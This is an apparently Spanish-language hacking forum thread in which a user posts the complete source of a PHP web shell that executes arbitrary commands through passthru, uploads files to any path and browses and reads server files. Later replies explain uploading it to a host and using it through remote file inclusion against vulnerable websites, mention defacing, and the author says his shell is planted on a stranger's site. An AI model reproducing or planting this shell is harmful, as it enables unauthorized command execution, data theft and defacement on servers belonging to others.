Mostrar mensajes previos
Ordenar por
por elkifo Sin sí­ntomas
Aunque no veo mucho movimiento por aqui de hack/deface os dejo a algo que tengo como a un hijo, mi shell php, ya se que no es bonita, pero siempre me ha servido y fue creo lo primero que programe en php hace muuuucho tiempo(5 años o mas).

<html><head><title>Nuxino Shell</title>
<STYLE>
td {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #eeeeee 1px solid;
BORDER-LEFT: #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
BACKGROUND-COLOR:black;
}
textarea {BACKGROUND-COLOR: #000000;COLOR: #ffffff;}
BODY {BACKGROUND-COLOR:black;COLOR: #ffffff;}
A:link {COLOR:white}
A:visited { COLOR:white}
A:active {COLOR:white}
A:hover {color:white}
</STYLE>
</head><body>
<?php
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$os = php_uname();
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "shell";}
echo "Sistema Operativo: ".$os."<br> Servidor: ".(htmlentities($_SERVER['SERVER_SOFTWARE']))."<br>Ip: ".$_SERVER['REMOTE_ADDR']."<br><br>|<a href=$self?ac=shell> Shell </a>|<a href=$self?ac=navigation> Archivos </a>|<pre>";
switch($ac) {
case "shell":
echo <<<HTML
<table>
<form action="$self" method="POST">
<input type="hidden" name="ac" value="shell">
<tr><td>CMD > <input size="60" type="text" name="c"><input type="submit" value="Ejecutar"></td></tr>
<tr><td>
<textarea cols="60" rows="15">
HTML;
if (!empty($_POST['c'])){
passthru($_POST['c']);
}
echo "</textarea></td>$tend";
echo <<<HTML
<b>Subir archivo</b>
<table>
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="shell">
<tr><td>Archivo:</td><td><input size="55" name="file" type="file"></td></tr>
<tr><td>Ruta:</td><td><input size="63" value="$docr/" name="path" type="text"><input type="submit" value="Subir"></td>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
echo "Subido correctamente $uploadfile\n";
} else { print "Ha ocurrido un error:\n";}
}
break;
case "navigation":
$images=array(".gif",".jpg",".png",".bmp",".jpeg");
$whereme=getcwd();
@$d=@$_GET['d'];
$copyr = "<center>";
$php_self=@$_SERVER['PHP_SELF'];
if(@eregi("/",$whereme)){$os="unix";}
if(!isset($d)){$d=$whereme;}
$d=str_replace("\\","/",$d);
$expl=explode("/",$d);
$coun=count($expl);
if($os=="unix"){echo "<a href='$php_self?ac=navigation&d=/'>/</a>";}
else{
echo "<a href='$php_self?ac=navigation&d=$expl[0]'>$expl[0]/</a>";}
for($i=1; $i<$coun; $i++){
@$xx.=$expl[$i]."/";
$sls="<a href='$php_self?ac=navigation&d=$expl[0]/$xx'>$expl[$i]</a>/";
$sls=str_replace("//","/",$sls);
$sls=str_replace("/'></a>/","/'></a>",$sls);
print $sls;
}
echo "</td></tr>";
if(@$_GET['e']){
$d=@$_GET['d'];
$e=@$_GET['e'];
$pinf=pathinfo($e);
$filename="$d/$e";
$fd = @fopen ($filename, "r");
$c = @fread ($fd, @filesize ($filename));
$c=htmlspecialchars($c);
$de=$d."/".$e;
$de=str_replace("//","/",$de);
echo "<table><tr><td><pre>$c</pre></td></tr></table>";
exit;
}
$dirs=array();
$files=array();
$dh = @opendir($d) or die("<table><tr><td><center>No se ha podido abrir!</center><br>$copyr</td></tr></table>");
while (!(($file = readdir($dh)) === false)) {
if ($file=="." || $file=="..") continue;
if (@is_dir("$d/$file")) {
$dirs[]=$file;
}else{
$files[]=$file;
}
sort($dirs);
sort($files);
$fz=@filesize("$d/$file");
}
function perm($perms){
if (($perms & 0xC000) == 0xC000) {
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
for ($i=0;$i<sizeof($dirs);$i++) {
if ($dirs[$i] != "..") {
$perms = @fileperms($d."/".$dirs[$i]);
$owner = @fileowner($d."/".$dirs[$i]);
if($os=="unix"){
$fileownera=posix_getpwuid($owner);
$owner=$fileownera['name'];
}
$group = @filegroup($d."/".$dirs[$i]);
if($os=="unix"){
$groupinfo = posix_getgrgid($group);
$group=$groupinfo['name'];
}
$info=perm($perms);
$linkd="<a href='$php_self?ac=navigation&d=$d/$dirs[$i]'>$dirs[$i]</a>";
$linkd=str_replace("//","/",$linkd);
echo "<br><tr><td><font face=wingdings size=2>0</font>$linkd</td>&nbsp;</td><td>$info</td></tr>";
}
}
for ($i=0;$i<sizeof($files);$i++) {
$size=@filesize($d."/".$files[$i]);
$perms = @fileperms($d."/".$files[$i]);
$owner = @fileowner($d."/".$files[$i]);
if($os=="unix"){
$fileownera=posix_getpwuid($owner);
$owner=$fileownera['name'];
}
$group = @filegroup($d."/".$files[$i]);
if($os=="unix"){
$groupinfo = posix_getgrgid($group);
$group=$groupinfo['name'];
}
$prava=perm($perms);
if ($size < 1024){$siz=' '.$size.' b ';
}else{
if ($size < 1024*1024){$siz=' '.number_format(($size/1024), 2, '.', '').' kb ';}else{
if ($size < 1000000000){$siz=' '.number_format($size/(1024*1024), 2, '.', '').' mb ';}else{
if ($size < 1000000000000){$siz=' '.number_format($size/(1024*1024*1024), 2, '.', '').' gb ';}
}}}
echo "<br><tr><font face=wingdings size=3>2</font> <a href='$php_self?ac=navigation&d=$d&e=$files[$i]''>$files[$i]</a></td><td>$siz</td><td>$prava</td></tr>";
}
echo "</table></td></tr></table>";
break;
}
if($p=="yes"){
$path=__FILE__;
@unlink($path);
$path=str_replace("\\","/",$path);
}
?>
</pre></body></html>
Buscando mi Main()
por elkifo Sin sí­ntomas
pues haber en clase aprendi c html javascript delphi y php, luego por cosas del curro vb y algo de java, y luego por cuenta propia c# y perl, aparte de tocar bases de datos, servidores de cualquier clase, etc etc
Buscando mi Main()
por elkifo Sin sí­ntomas
comorrrrr? ke te lleva a donde?????????

Mmmm aver el funcionamiento de la shell es el siguiente:
Se coge el code y se pega en un txt, se renombra a .php y eso se sube a un host.
Despues [Enlace externo eliminado para invitados] y podras ejecutar comandos y ver los archivos.

Luego normalmente se usa para lo siguiente:

[Enlace externo eliminado para invitados] ... mbrado.php
con eso verias los archivos de la webvulnerable y podrias ejecutar comandos en ese host.

No se si a alguno le interesa el tema abro un mini post para explicar por encima de ke va la cosa.
Buscando mi Main()
por GhoStHa
Deic escribió:No lo entiendo muy bien :S. me lleva aquí el shell: [Enlace externo eliminado para invitados]


Deic si no sabes muy bien como se trata
el defacing por favor preguntalo pero
no digas cosas que no sabes

Eso se pega en un bloc de notas con .php y lo subes a un host

buscas la web y demas.. que vienen en muchos tutoriales


SALUDOS


EDIT: Se me adelantó elkifo
por elkifo Sin sí­ntomas
Como no me kedao muy trankilo un ejemplo mejor ke nada

[Enlace externo eliminado para invitados]

Esa es mi shell, practica y sencilla, por supuesto esta subida a una web que no es mia ni tengo ni idea de quien es, intentar no romper mucho jejejeje

[Enlace externo eliminado para invitados]?

Y esta es otra shell, mas bonita, mas colorines, pero bueno yo me apaño con cualquier cosa.
Buscando mi Main()
por Deic Sin sí­ntomas
GhoStHa escribió:
Deic escribió:No lo entiendo muy bien :S. me lleva aquí el shell: [Enlace externo eliminado para invitados]


Deic si no sabes muy bien como se trata
el defacing por favor preguntalo pero
no digas cosas que no sabes

Eso se pega en un bloc de notas con .php y lo subes a un host

buscas la web y demas.. que vienen en muchos tutoriales


SALUDOS


EDIT: Se me adelantó elkifo
O sea si es una shell en .php sentido común que hay que guardarlo como .php en un bloc de notas y subirlo a un host ... Digo que me lleva a esa página cuando voy a donde lo subí -.-'...
Imagen
por elkifo Sin sí­ntomas
raro raro raro, como puedes comprobar no hay ningun link en el source a esa web ni nada que se parezca.
Buscando mi Main()
por wasamandrapa Se conecta desde un manicomio
Disculpen lo BRUTO QUE SOY
Imagen
, alguien que me esplique esto aunquesea con manzanas.
-Aprovechemos mientras Windows es vulnerable.
-No hagas a otros lo que no te gustaría que hagan con.... tu mamá.
-El mejor Snifer es tu propio ISP.
por Santaman Sin sí­ntomas
elkifo escribió:Bueno pues nada me auto impongo como tarea un manualillo sobre rfi.
ok jaja
auqnue podrias decirme con que bug sacastes esas shell osea si era rfi local file upload...
Gracias, si no puedes x aki me envias un pv jaja

Código: Seleccionar todo

@echo off
:yeah
msg * Santaman Rulez!!´
goto yeah
end
Prueva mi firma Baby xD
Temas similares
Miindeath: Una shell inversa minimalista :) por DtxdF en Troyanos y Herramientas
VbRev – Reverse Shell GUI por xrahitel en Manuales y Tutoriales
Variantes de tema
Responder

Volver a “Nuestros Programas”